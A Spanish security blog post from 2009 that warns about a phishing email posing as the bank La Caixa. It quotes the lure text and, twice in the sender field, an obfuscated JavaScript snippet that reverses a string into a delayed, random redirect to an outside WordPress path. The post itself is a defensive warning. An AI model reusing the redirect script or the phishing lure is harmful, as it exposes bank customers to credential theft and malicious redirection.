URGENTE : Phishing de hoy de LaCaixa
Se recibe un mail de La Caixa muy bien redactado, con el siguiente texto:
De: -la Caixa- <$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:usuario0364@caixa.es”>usuario0364@caixa.es
Enviado: vie,27 noviembre, 2009 08:04
Asunto: leer ahora
Hemos detectado un ligero error en la información de su cuenta.
Para eliminar este error de forma segura ,por favor ,descargue
el formulario adjunto a este mensaje y abrirla en un navegador web
Gracias!
Ficheros adjuntos:
untitled-[1.1] 0.5 k [ text/plain ] Descargar | Ver
lacaixa-8394.htm 2.8 k [ application/octet-stream ] Descargar | Ver
al abrir el HTML aparece la siguiente pantalla:
De: -la Caixa- <$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:usuario0364@caixa.es”>usuario0364@caixa.es
Enviado: vie,27 noviembre, 2009 08:04
Asunto: leer ahora
Hemos detectado un ligero error en la información de su cuenta.
Para eliminar este error de forma segura ,por favor ,descargue
el formulario adjunto a este mensaje y abrirla en un navegador web
Gracias!
Ficheros adjuntos:
untitled-[1.1] 0.5 k [ text/plain ] Descargar | Ver
lacaixa-8394.htm 2.8 k [ application/octet-stream ] Descargar | Ver
al abrir el HTML aparece la siguiente pantalla:
Por supuesto que no se deben entrar datos en ninguna pantalla procedente de un mail no solicitado !!!
Además este debe eliminarse de entrada, pues contiene script sospechoso que pasamos a analizar.
saludos
ms, 27-11-2009
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Los comentarios están cerrados.